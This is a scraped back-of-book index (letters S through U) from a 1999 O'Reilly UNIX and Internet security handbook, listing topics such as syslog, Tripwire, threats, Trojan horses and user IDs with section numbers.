TCB files : 8.5.3.2. Trusted computing base<br />

using passwd command : 3.5. Verifying Your New Password<br />

web server as : 18.2.1. The Server's UID<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_s.htm (16 of 20) [2002-04-12 10:43:58]


Index<br />

SURFnet : F.3.4.25. Netherlands: SURFnet-connected sites<br />

surges : (see power surges)<br />

SVR4 (System V Release 4) : 1.3. History of <strong>UNIX</strong><br />

swap partition : 5.5.1. SUID, SGID, and Sticky Bits<br />

swap space : 25.2.3. Swap Space Problems<br />

Swatch program<br />

10.6. Swatch: A Log File Tool<br />

10.6.2. The Swatch Configuration File<br />

E.4.9. Swatch<br />

SWITCH : F.3.4.35. SWITCH-connected sites<br />

symbolic links and permissions : 5.1.7. File Permissions in Detail<br />

symbolic-link following<br />

18.2.2.2. Additional configuration issues<br />

18.3.2. Commands Within the Block<br />

SymLinksIfOwnerMatch option : 18.3.2. Commands Within the Block<br />

symmetric key : (see private-key cryptography)<br />

SYN bit : 16.2.4.2. TCP<br />

sync system call<br />

5.6. Device Files<br />

8.1.3. Accounts That Run a Single Command<br />

sys (user) : 4.1. Users and Groups<br />

syslog facility<br />

4.3.7. The Bad su Log<br />

10.5. The <strong>UNIX</strong> System Log (syslog) Facility<br />

10.5.3.1. Beware false log entries<br />

23.1.1. The Lesson of the <strong>Internet</strong> Worm<br />

false log entries : 10.5.3.1. Beware false log entries<br />

where to log<br />

10.5.2. Where to Log<br />

10.5.2.3. Logging everything everywhere<br />

syslog file : 17.3.4.3. Improving the security of Berkeley sendmail V8<br />

syslog.conf file : 10.5.1. The syslog.conf Configuration File<br />

systat service : 17.3.1. systat (TCP Port 11)<br />

system<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_s.htm (17 of 20) [2002-04-12 10:43:58]


Index<br />

auditing activity on : 2.1. Planning Your <strong>Sec</strong>urity Needs<br />

backing up critical files<br />

7.3. Backing Up System Files<br />

7.3.2. Building an Automatic Backup System<br />

control over : (see access control)<br />

database files : 1.2. What Is an Operating System?<br />

overload attacks : 25.2.1.2. System overload attacks<br />

performance : (see performance)<br />

remote, commands on : 15.1.2. uux Command<br />

summarizing usage per user : 25.2.2.2. quot command<br />

transfering files to other : 15.1.1. uucp Command<br />

system (in swatch program) : 10.6.2. The Swatch Configuration File<br />

system administration : 2.4.4.5. Have authority commensurate with responsibility<br />

avoiding conventional passwords<br />

8.8. Administrative Techniques for Conventional Passwords<br />

8.8.9. Account Names Revisited: Using Aliases for Increased <strong>Sec</strong>urity<br />

change monitoring : 9.3. A Final Note<br />

changing passwords<br />

8.4.1. Changing an Account's Password<br />

8.8.8. Disabling an Account by Changing Its Password<br />

cleaning up /tmp directory : 25.2.4. /tmp Problems<br />

contacting administrator : 24.2.4.2. How to contact the system administrator of a computer you<br />

don't know<br />

controlling UUCP security : 15.3. UUCP and <strong>Sec</strong>urity<br />

detached signatures (PGP) : 6.6.3.6. PGP detached signatures<br />

disabling finger system : 17.3.8.2. Disabling finger<br />

discovering intruders<br />

24.2. Discovering an Intruder<br />

24.2.6. Anatomy of a Break-in<br />

dual universes and : 5.9.1. Dual Universes<br />

errors by : 7.1.1.1. A taxonomy of computer failures<br />

finding largest files : 25.2.2.1. Disk-full attacks<br />

immutable files and : 9.1.1. Immutable and Append-Only Files<br />

locked accounts : 3.3. Entering Your Password<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_s.htm (18 of 20) [2002-04-12 10:43:58]


Index<br />

message authentication : 6.5.2. Using Message Digests<br />

monitoring phantom mail : 17.3.4.2. Using sendmail to receive email<br />

new passwords : 3.4. Changing Your Password<br />

read-only filesystems and : 9.1.2. Read-only Filesystems<br />

references on : D.1.11. <strong>UNIX</strong> Programming and System Administration<br />

removing automatic backups : 18.2.3.5. Beware stray CGI scripts<br />

sanitizing media : 12.3.2.3. Sanitize your media before disposal<br />

trusting : 27.3.2. Your System Administrator?<br />

weakness-finding tools : 11.1.1. <strong>Sec</strong>urity Tools<br />

system call : 5.1.7. File Permissions in Detail<br />

system clock<br />

changing<br />

5.1.5. File Times<br />

9.2.3. Checksums and Signatures<br />

17.3.14. Network Time Protocol (NTP) (UDP Port 123)<br />

for random seeds : 23.8. Picking a Random Seed<br />

<strong>Sec</strong>ure RPC timestamp : 19.3.1.3. Setting the window<br />

system files : 11.6.1.2. Writable system files and directories<br />

initialization files : 11.5.3.5. System initialization files<br />

system function<br />

5.5.3.2. Another SUID example: IFS and the /usr/lib/preserve hole<br />

18.2.3.2. Testing is not enough!<br />

18.2.3.3. Sending mail<br />

23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

system functions, checking arguments to : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

System Network Architecture (SNA) : 16.4.2. SNA<br />

System V <strong>UNIX</strong><br />

Which <strong>UNIX</strong> System?<br />

1.3. History of <strong>UNIX</strong><br />

accounting with : 10.2.1. Accounting with System V<br />

chroot in : 8.1.5. Restricted Filesystem<br />

default umask value : 5.3. The umask<br />

groups and : 4.1.3.2. Groups and older AT&T <strong>UNIX</strong><br />

inittab program : C.5.1. Process #1: /etc/init<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_s.htm (19 of 20) [2002-04-12 10:43:58]


Index<br />

modems and : 14.5.1. Hooking Up a Modem to Your Computer<br />

passwords : 8.1.1. Accounts Without Passwords<br />

ps command with : C.1.2.1. Listing processes with systems derived from System V<br />

random number generators : 23.7.3. drand48 ( ), lrand48 ( ), and mrand48 ( )<br />

recent login times : 10.1.1. lastlog File<br />

Release 4 (SVR4) : 1.3. History of <strong>UNIX</strong><br />

restricted shells : 8.1.4.1. Restricted shells under System V <strong>UNIX</strong><br />

SGI bit on files : 5.5.7. SGID Bit on Files (System V <strong>UNIX</strong> Only): Mandatory Record Locking<br />

su command and : 4.3.6. Restricting su<br />

SUID files, list of : B.3. SUID and SGID Files<br />

utmp and wtmp files : 10.1.2. utmp and wtmp Files<br />

UUCP : 15.4.1.3. Format of USERFILE entry without system name<br />

/var/adm/loginlog file : 10.1.4. loginlog File<br />

wtmpx file : 10.1.2. utmp and wtmp Files<br />

Systems file : 15.3.3. <strong>Sec</strong>urity of L.sys and Systems Files<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Copyright © 1999 <strong>O'Reilly</strong> & Associates, Inc. All Rights Reserved.<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_s.htm (20 of 20) [2002-04-12 10:43:58]


Index<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Index: T<br />

table objects (NIS+) : 19.5.3. NIS+ Tables<br />

TACACS : 17.3.5. TACACS (UDP Port 49)<br />

tainting<br />

18.2.3.4. Tainting with Perl<br />

23.4. Tips on Writing SUID/SGID Programs<br />

taintperl<br />

5.5.3. SUID Shell Scripts<br />

18.2.3.4. Tainting with Perl<br />

23.4. Tips on Writing SUID/SGID Programs<br />

talk program : 11.1.4. Trojan Horses<br />

tandem backup : 7.1.4. Guarding Against Media Failure<br />

tar program<br />

6.6.1.2. Ways of improving the security of crypt<br />

7.3.2. Building an Automatic Backup System<br />

7.4.2. Simple Archives<br />

7.4.4. Encrypting Your Backups<br />

24.2.6. Anatomy of a Break-in<br />

Taylor UUCP : 15.2. Versions of UUCP<br />

TCB (trusted computing base) : 8.5.3.2. Trusted computing base<br />

/tcb directory : 8.1.1. Accounts Without Passwords<br />

tcov tester : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

TCP (Transmission Control Protocol)<br />

16.2.4.2. TCP<br />

TCP/IP<br />

17.1.3. The /etc/inetd Program<br />

(see also network services)<br />

connections, clogging : 25.3.4. Clogging<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_t.htm (1 of 10) [2002-04-12 10:44:00]


Index<br />

1.4.3. Add-On Functionality Breeds Problems<br />

10.5.2.2. Logging across the network<br />

(see also networks)<br />

checklist for<br />

A.1.1.15. Chapter 16: TCP/IP Networks<br />

A.1.1.16. Chapter 17: TCP/IP Services<br />

network services : (see network services)<br />

networks<br />

16. TCP/IP Networks<br />

16.5. Summary<br />

tcpwrapper program<br />

17.2. Controlling Access to Servers<br />

tcsh<br />

E.4.10. tcpwrapper<br />

11.5.1. Shell Features<br />

(see also shells)<br />

history file : 10.4.1. Shell History<br />

telecommunications : 26.2.2. Federal Jurisdiction<br />

telephone<br />

14.3.1. Originate and Answer<br />

(see also modems)<br />

calls, recording outgoing : 10.3.1. aculog File<br />

cellular : 12.2.1.8. Electrical noise<br />

checklist for : A.1.1.13. Chapter 14: Telephone <strong>Sec</strong>urity<br />

hang-up signal : (see signals)<br />

lines : 14.5.4. Physical Protection of Modems<br />

leasing : 14.5.4. Physical Protection of Modems<br />

one-way : 14.4.1. One-Way Phone Lines<br />

physical security of : 14.5.4. Physical Protection of Modems<br />

Telnet versus : 17.3.3. TELNET (TCP Port 23)<br />

Telnet utility<br />

3.5. Verifying Your New Password<br />

16.2.5. Clients and Servers<br />

17.3.3. TELNET (TCP Port 23)<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_t.htm (2 of 10) [2002-04-12 10:44:00]


Index<br />

versus rlogin : 17.3.18. rlogin and rsh (TCP Ports 513 and 514)<br />

telnetd program : 11.1.2. Back Doors and Trap Doors<br />

temperature : 12.2.1.6. Temperature extremes<br />

TEMPEST system : 12.3.1.3. Eavesdropping by radio and using TEMPEST<br />

terminal name and last command : 10.1.3. last Program<br />

terrorism : 12.2.5. Defending Against Acts of War and Terrorism<br />

testing<br />

CGI scripts : 18.2.3.2. Testing is not enough!<br />

core files and : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

programs : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

software : 1.4.2. Software Quality<br />

TFTP (Trivial File Transfer Protocol) : 17.3.7. Trivial File Transfer Protocol (TFTP) (UDP Port 69)<br />

tftpd server : 17.3.7. Trivial File Transfer Protocol (TFTP) (UDP Port 69)<br />

theft<br />

7.1.1.1. A taxonomy of computer failures<br />

12.2.6. Preventing Theft<br />

12.2.6.4. Minimizing downtime<br />

12.4.1.2. Potential for eavesdropping and data theft<br />

of backups<br />

12.3.2. Protecting Backups<br />

12.3.2.4. Backup encryption<br />

of RAM chips : 12.2.6. Preventing Theft<br />

thieves : 11.3. Authors<br />

third-party billing : 14.5.4. Physical Protection of Modems<br />

Thompson, Ken<br />

1.3. History of <strong>UNIX</strong><br />

8.6. The <strong>UNIX</strong> Encrypted Password System<br />

threats<br />

assessing cost of : 2.3.3. Adding Up the Numbers<br />

back doors : (see back doors)<br />

to backups<br />

7.1.6. <strong>Sec</strong>urity for Backups<br />

7.1.6.3. Data security for backups<br />

bacteria programs : 11.1.7. Bacteria and Rabbits<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_t.htm (3 of 10) [2002-04-12 10:44:00]


Index<br />

biological : 12.2.1.7. Bugs (biological)<br />

broadcast storms : 25.3.2. Message Flooding<br />

via CGI scripts : 18.2.3.2. Testing is not enough!<br />

changing file owners : 5.7. chown: Changing a File's Owner<br />

changing system clock : 5.1.5. File Times<br />

code breaking<br />

6.1.1. Code Making and Code Breaking<br />

(see also cryptography)<br />

commonly attacked accounts : 8.1.2. Default Accounts<br />

computer failures : 7.1.1.1. A taxonomy of computer failures<br />

decode aliases : 17.3.4.2. Using sendmail to receive email<br />

deep tree structures : 25.2.2.8. Tree-structure attacks<br />

denial of service<br />

17.1.3. The /etc/inetd Program<br />

17.3.21.5. Denial of service attacks under X<br />

25. Denial of Service Attacks and Solutions<br />

25.3.4. Clogging<br />

accidental : 25.2.5. Soft Process Limits: Preventing Accidental Denial of Service<br />

checklist for : A.1.1.24. Chapter 25: Denial of Service Attacks and Solutions<br />

destructive attacks : 25.1. Destructive Attacks<br />

disk attacks<br />

25.2.2. Disk Attacks<br />

25.2.2.8. Tree-structure attacks<br />

overload attacks<br />

25.2. Overload Attacks<br />

25.2.5. Soft Process Limits: Preventing Accidental Denial of Service<br />

system overload attacks : 25.2.1.2. System overload attacks<br />

disposed materials : 12.3.3. Other Media<br />

DNS client flooding : 16.3.2. <strong>Sec</strong>urity and Nameservice<br />

DNS nameserver attacks : 17.3.6.2. DNS nameserver attacks<br />

DNS zone transfers : 17.3.6.1. DNS zone transfers<br />

dormant accounts<br />

8.4. Managing Dormant Accounts<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_t.htm (4 of 10) [2002-04-12 10:44:00]


Index<br />

8.4.3. Finding Dormant Accounts<br />

false syslog entries : 10.5.3.1. Beware false log entries<br />

filename attacks : 11.5.1.4. Filename attacks<br />

hidden space : 25.2.2.7. Hidden space<br />

HOME variable attacks : 11.5.1.3. $HOME attacks<br />

identifying and quantifying<br />

2.2.1.2. Identifying threats<br />

2.2.2. Review Your Risks<br />

IFS variable attacks : 11.5.1.2. IFS attacks<br />

intruders : (see intruders)<br />

letting in accidentally : 11.4. Entry<br />

logic bombs<br />

11.1.3. Logic Bombs<br />

27.2.2. Viruses on the Distribution Disk<br />

mailing list for : E.1.3.9. RISKS<br />

media failure : 7.1.4. Guarding Against Media Failure<br />

meet-in-the-middle attacks : 6.4.5.1. Double DES<br />

MUD/IRC client programs : 17.3.23. Other TCP Ports: MUDs and <strong>Internet</strong> Relay Chat (IRC)<br />

newly created accounts : 24.4.1. New Accounts<br />

NIS, unintended disclosure : 19.4.5. Unintended Disclosure of Site Information with NIS<br />

with NNTP : 17.3.13. Network News Transport Protocol (NNTP) (TCP Port 119)<br />

open (guest) accounts<br />

8.1.4. Open Accounts<br />

8.1.4.6. Potential problems with rsh<br />

PATH variable attacks : 11.5.1.1. PATH attacks<br />

plaintext attacks : 6.2.3. Cryptographic Strength<br />

playback (replay) attacks : 19.6.1.2. Using the ticket granting ticket<br />

programmed<br />

11. Protecting Against Programmed Threats<br />

11.6.2. Shared Libraries<br />

A.1.1.10. Chapter 11: Protecting Against Programmed Threats<br />

D.1.4. Computer Viruses and Programmed Threats<br />

authors of : 11.3. Authors<br />

damage from : 11.2. Damage<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_t.htm (5 of 10) [2002-04-12 10:44:00]


Index<br />

replay attacks : 17.3.14. Network Time Protocol (NTP) (UDP Port 123)<br />

rsh, problems with : 8.1.4.6. Potential problems with rsh<br />

sendmail problems : 17.3.4.1. sendmail and security<br />

spoofed network connection : 8.5.3.1. Trusted path<br />

start-up file attacks<br />

11.5.2. Start-up File Attacks<br />

11.5.2.7. Other initializations<br />

system clock : (see system clock)<br />

theft : (see theft)<br />

/tmp directory attacks : 25.2.4. /tmp Problems<br />

toll fraud : 14.4.1. One-Way Phone Lines<br />

traffic analysis : 18.4. Avoiding the Risks of Eavesdropping<br />

tree-structure attacks : 25.2.2.8. Tree-structure attacks<br />

Trojan horses<br />

4.3.5. Using su with Caution<br />

11.1.4. Trojan Horses<br />

11.5. Protecting Yourself<br />

17.3.21.2. X security<br />

19.6.5. Kerberos Limitations<br />

27.2.2. Viruses on the Distribution Disk<br />

trusted hosts : (see trusted, hosts)<br />

unattended terminals<br />

12.3.5. Unattended Terminals<br />

12.3.5.2. X screen savers<br />

unowned files : 24.4.1.8. Unowned files<br />

vandalism<br />

12.2.4. Vandalism<br />

12.2.4.3. Network connectors<br />

viruses<br />

11.1.5. Viruses<br />

(see viruses)<br />

war and terrorism : 12.2.5. Defending Against Acts of War and Terrorism<br />

weakness-finding tools : 11.1.1. <strong>Sec</strong>urity Tools<br />

by web browsers<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_t.htm (6 of 10) [2002-04-12 10:44:00]


Index<br />

18.5. Risks of Web Browsers<br />

18.5.2. Trusting Your Software Vendor<br />

worms : 11.1.6. Worms<br />

three-way handshake (TCP) : 16.2.4.2. TCP<br />

ticket-granting service<br />

19.6.1.1. Initial login<br />

19.6.1.2. Using the ticket granting ticket<br />

19.6.1.3. Authentication, data integrity, and secrecy<br />

tickets : (see Kerberos system)<br />

Tiger : E.4.11. Tiger<br />

tilde (~)<br />

in automatic backups : 18.2.3.5. Beware stray CGI scripts<br />

time<br />

as home directory : 11.5.1.3. $HOME attacks<br />

~! in mail messages : 8.1.3. Accounts That Run a Single Command<br />

19.3.1.3. Setting the window<br />

(see also NTP; system clock)<br />

CPU, accounting<br />

10.2. The acct/pacct Process Accounting File<br />

10.2.3. messages Log File<br />

defining random seed by : 23.8. Picking a Random Seed<br />

modification<br />

5.1.2. Inodes<br />

5.1.5. File Times<br />

7.4.7. inode Modification Times<br />

9.2.2. Checklists and Metadata<br />

24.5.1. Never Trust Anything Except Hardcopy<br />

most recent login : 10.1.1. lastlog File<br />

<strong>Sec</strong>ure RPC window of : 19.3.1.3. Setting the window<br />

timeouts<br />

11.1.3. Logic Bombs<br />

23.3. Tips on Writing Network Programs<br />

timesharing<br />

19.6.5. Kerberos Limitations<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_t.htm (7 of 10) [2002-04-12 10:44:00]


Index<br />

23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

Timezone table (NIS+) : 19.5.3. NIS+ Tables<br />

tip command<br />

10.3.1. aculog File<br />

14.5. Modems and <strong>UNIX</strong><br />

14.5.3.1. Originate testing<br />

14.5.3.3. Privilege testing<br />

-l option : 14.5.3.1. Originate testing<br />

TIS <strong>Internet</strong> Firewall Toolkit (FWTK) : E.4.12. TIS <strong>Internet</strong> Firewall Toolkit<br />

TMOUT variable : 12.3.5.1. Built-in shell autologout<br />

/tmp directory<br />

14.5.3.3. Privilege testing<br />

25.2.4. /tmp Problems<br />

tmpfile function : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

token cards : 8.7.2. Token Cards<br />

token ring : 16.1. Networking<br />

toll fraud : 14.4.1. One-Way Phone Lines<br />

tools : 1.3. History of <strong>UNIX</strong><br />

to find weaknesses : 11.1.1. <strong>Sec</strong>urity Tools<br />

quality of<br />

1.4.2. Software Quality<br />

1.4.3. Add-On Functionality Breeds Problems<br />

Totient Function : 6.4.6.1. How RSA works<br />

tracing connections<br />

24.2.4. Tracing a Connection<br />

24.2.4.2. How to contact the system administrator of a computer you don't know<br />

trademarks : 26.4.3. Trademark Violations<br />

traffic analysis : 18.4. Avoiding the Risks of Eavesdropping<br />

training : 13.2.1. Initial Training<br />

transfer zones : 16.2.6.1. DNS under <strong>UNIX</strong><br />

transfering files : 15.1.1. uucp Command<br />

Transmission Control Protocol (TCP) : 16.2.4.2. TCP<br />

Transmit Data (TD) : 14.3. The RS-232 Serial Protocol<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_t.htm (8 of 10) [2002-04-12 10:44:00]


Index<br />

transmitters, radio : 12.2.1.8. Electrical noise<br />

transposition (in encryption) : 6.1.2. Cryptography and Digital Computers<br />

trap doors : (see back doors)<br />

trashing : 12.3.3. Other Media<br />

tree structures : 25.2.2.8. Tree-structure attacks<br />

trimlog : E.4.13. trimlog<br />

Triple DES<br />

6.4.5. Improving the <strong>Sec</strong>urity of DES<br />

6.4.5.2. Triple DES<br />

Tripwire package<br />

9.2.4. Tripwire<br />

9.2.4.2. Running Tripwire<br />

19.5.5. NIS+ Limitations<br />

E.4.14. Tripwire<br />

Trivial File Transfer Protocol (TFTP) : 17.3.7. Trivial File Transfer Protocol (TFTP) (UDP Port 69)<br />

Trojan horses<br />

4.3.5. Using su with Caution<br />

11.1.4. Trojan Horses<br />

11.5. Protecting Yourself<br />

27.2.2. Viruses on the Distribution Disk<br />

Kerberos and : 19.6.5. Kerberos Limitations<br />

X clients : 17.3.21.2. X security<br />

truncate system call : 5.1.7. File Permissions in Detail<br />

trust<br />

1.1. What Is Computer <strong>Sec</strong>urity?<br />

2.1.1. Trust<br />

27. Who Do You Trust?<br />

27.4. What All This Means<br />

of log files : 10.8. Managing Log Files<br />

trusted<br />

8.5.3.2. Trusted computing base<br />

17.1.1. The /etc/services File<br />

hosts<br />

17.3.18.1. Trusted hosts and users<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_t.htm (9 of 10) [2002-04-12 10:44:00]


Index<br />

17.3.18.4. The ~/.rhosts file<br />

NFS and : 17.3.18.2. The problem with trusted hosts<br />

path : 8.5.3.1. Trusted path<br />

ports : 1.4.3. Add-On Functionality Breeds Problems<br />

users<br />

17.3.4.1. sendmail and security<br />

17.3.18.1. Trusted hosts and users<br />

TRW Network Area and System Administrators : F.3.4.36. TRW network area and system administrators<br />

tty file : 7.1.2. What Should You Back Up?<br />

ttymon program : C.5.2. Logging In<br />

ttys file<br />

8.5.1. <strong>Sec</strong>ure Terminals<br />

14.5.1. Hooking Up a Modem to Your Computer<br />

ttytab file : C.5.1. Process #1: /etc/init<br />

ttywatch program : 24.2.3. Monitoring the Intruder<br />

tunefs command : 25.2.2.6. Reserved space<br />

tunneling : 16.4.1. IPX<br />

twisted pair : 16.1. Networking<br />

TZ variable : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Copyright © 1999 <strong>O'Reilly</strong> & Associates, Inc. All Rights Reserved.<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_t.htm (10 of 10) [2002-04-12 10:44:00]


Index<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Index: U<br />

U.S. Department of Energy : F.3.4.12. France: universities, Ministry of Research and Education in<br />

France, CNRS, CEA, INRIA, CNES, INRA, IFREMER, and EDF<br />

U.S. Department of the Navy : F.3.4.44. U.S. Department of the Navy<br />

U.S. law : (see laws)<br />

U.S. <strong>Sec</strong>ret Service<br />

26.2.2. Federal Jurisdiction<br />

F.3.3. U.S. <strong>Sec</strong>ret Service (USSS)<br />

UDP (User Datagram Protocol)<br />

16.2.4.3. UDP<br />

17.1.3. The /etc/inetd Program<br />

(see also network services)<br />

packet relayer : E.4.15. UDP Packet Relayer<br />

ufsdump : (see dump/restore program)<br />

UIDs (user identifiers)<br />

4.1. Users and Groups<br />

4.1.2. Multiple Accounts with the Same UID<br />

real versus effective<br />

4.3.1. Real and Effective UIDs<br />

C.1.3.2. Process real and effective UID<br />

RPC requests and : 19.2.2.2. AUTH_<strong>UNIX</strong><br />

su command and : 10.1.2.1. su command and /etc/utmp and /var/adm/wtmp files<br />

of web servers : 18.2.1. The Server's UID<br />

zero : (see root account; superuser)<br />

UK Defense Research Agency : F.3.4.37. UK: Defense Research Agency<br />

ulimit command : 25.2.5. Soft Process Limits: Preventing Accidental Denial of Service<br />

Ultrix : 1.3. History of <strong>UNIX</strong><br />

trusted path : 8.5.3.1. Trusted path<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_u.htm (1 of 8) [2002-04-12 10:44:01]


Index<br />

UUCP : 15.4.1.3. Format of USERFILE entry without system name<br />

umask<br />

5.3. The umask<br />

5.3.2. Common umask Values<br />

8.4.3. Finding Dormant Accounts<br />

unattended terminals<br />

12.3.5. Unattended Terminals<br />

12.3.5.2. X screen savers<br />

uninterruptable power supply (UPS)<br />

2.2. Risk Assessment<br />

12.2.1.1. Fire<br />

Unisys : F.3.4.39. UK: other government departments and agencies<br />

universes : 5.9.1. Dual Universes<br />

<strong>UNIX</strong> : 1. Introduction<br />

add-on functionality of : 1.4.3. Add-On Functionality Breeds Problems<br />

conventional passwords : 3.2.6. Conventional <strong>UNIX</strong> Passwords<br />

DAC (Discretionary Access Controls) : 4.1.3. Groups and Group Identifiers (GIDs)<br />

DNS under : 16.2.6.1. DNS under <strong>UNIX</strong><br />

encryption programs for<br />

6.6. Encryption Programs Available for <strong>UNIX</strong><br />

6.6.3.6. PGP detached signatures<br />

filesystem<br />

5. The <strong>UNIX</strong> Filesystem<br />

5.10. Summary<br />

history of : 1.3. History of <strong>UNIX</strong><br />

modems and<br />

14.5. Modems and <strong>UNIX</strong><br />

14.5.3.3. Privilege testing<br />

networking and : 16.1.2. Networking and <strong>UNIX</strong><br />

operating systems : (see operating systems)<br />

primary network services<br />

17.3. Primary <strong>UNIX</strong> Network Services<br />

17.3.23. Other TCP Ports: MUDs and <strong>Internet</strong> Relay Chat (IRC)<br />

process scheduler : C.1.3.3. Process priority and niceness<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_u.htm (2 of 8) [2002-04-12 10:44:01]


Index<br />

processes : (see processes)<br />

programming references : D.1.11. <strong>UNIX</strong> Programming and System Administration<br />

published resources for : D.1. <strong>UNIX</strong> <strong>Sec</strong>urity References<br />

security and<br />

1.4. <strong>Sec</strong>urity and <strong>UNIX</strong><br />

1.4.3. Add-On Functionality Breeds Problems<br />

signals : C.3. Signals<br />

starting up<br />

C.5. Starting Up <strong>UNIX</strong> and Logging In<br />

C.5.3. Running the User's Shell<br />

Version 6 : 1.3. History of <strong>UNIX</strong><br />

viruses : (see viruses)<br />

web server on : 18.2. Running a <strong>Sec</strong>ure Server<br />

unlinked files : 25.2.2.7. Hidden space<br />

unowned files : 24.4.1.8. Unowned files<br />

unplugging connections : 24.2.5. Getting Rid of the Intruder<br />

unpredictability of randomness : 23.6. Tips on Generating Random Numbers<br />

upgrades, logging : 10.7.2.1. Exception and activity reports<br />

uploading stored information : 12.3.4. Protecting Local Storage<br />

UPS (uninterruptable power supply)<br />

2.2. Risk Assessment<br />

12.2.1.1. Fire<br />

uptime command : 8.1.3. Accounts That Run a Single Command<br />

urandom device : 23.7.4. Other random number generators<br />

Usenet<br />

17.3.13. Network News Transport Protocol (NNTP) (TCP Port 119)<br />

E.2. Usenet Groups<br />

(see also NNTP)<br />

cleanup scripts : 11.5.3. Abusing Automatic Mechanisms<br />

encryption for : (see ROT13 algorithm)<br />

posting breakins to : 24.6. Resuming Operation<br />

reporting security holes on : 2.5.1. Going Public<br />

User Datagram Protocol (UDP) : 16.2.4.3. UDP<br />

user error : 7.1.1.1. A taxonomy of computer failures<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_u.htm (3 of 8) [2002-04-12 10:44:01]


Index<br />

user IDs : (see UIDs)<br />

USERFILE file (UUCP)<br />

15.4.1. USERFILE: Providing Remote File Access<br />

15.4.2.1. Some bad examples<br />

usermod command<br />

-e option : 8.4.3. Finding Dormant Accounts<br />

-f option : 8.4.3. Finding Dormant Accounts<br />

-s option : 8.3. Restricting Logins<br />

usernames : 3.1. Usernames<br />

users<br />

aliases for : 8.8.9. Account Names Revisited: Using Aliases for Increased <strong>Sec</strong>urity<br />

doubling as passwords (Joes) : 3.6.2. Smoking Joes<br />

last command and : 10.1.3. last Program<br />

as passwords : 8.8.3.1. Joetest: a simple password cracker<br />

special<br />

4.2. Special Usernames<br />

4.2.3. Impact of the /etc/passwd and /etc/group Files on <strong>Sec</strong>urity<br />

using someone else's<br />

4.3. su: Changing Who You Claim to Be<br />

4.3.8. Other Uses of su<br />

4. Users, Groups, and the Superuser<br />

4.1. Users and Groups<br />

4.1.2. Multiple Accounts with the Same UID<br />

(see also groups; su command)<br />

assigning passwords to : 8.8.1. Assigning Passwords to Users<br />

auditing who is logged in<br />

10.1.2. utmp and wtmp Files<br />

10.1.2.1. su command and /etc/utmp and /var/adm/wtmp files<br />

authentication for Web : 18.3.3. Setting Up Web Users and Passwords<br />

becoming other<br />

4.3. su: Changing Who You Claim to Be<br />

4.3.8. Other Uses of su<br />

checklist for : A.1.1.2. Chapter 3: Users and Passwords<br />

dormant accounts and<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_u.htm (4 of 8) [2002-04-12 10:44:01]


Index<br />

8.4. Managing Dormant Accounts<br />

8.4.3. Finding Dormant Accounts<br />

identifiers for : (see UIDs)<br />

importing to NIS server<br />

19.4.1. Including or excluding specific accounts:<br />

19.4.4.2. Using netgroups to limit the importing of accounts<br />

letting in threats : 11.4. Entry<br />

limited : 8.1.5.1. Limited users<br />

logging<br />

10.4. Per-User Trails in the Filesystem<br />

10.4.3. Network Setup<br />

NIS passwords for : 19.3.2.1. Creating passwords for users<br />

nobody (<strong>Sec</strong>ure RPC) : 19.3.2.1. Creating passwords for users<br />

notifying about monitoring : 26.2.6. Other Tips<br />

proving identity of : 19.3.1.1. Proving your identity<br />

recognizing as intruders<br />

24.2. Discovering an Intruder<br />

24.2.6. Anatomy of a Break-in<br />

restricting certain : 18.3. Controlling Access to Files on Your Server<br />

root : (see root account; superuser)<br />

sending messages to : 10.5.1. The syslog.conf Configuration File<br />

summarizing system usage by : 25.2.2.2. quot command<br />

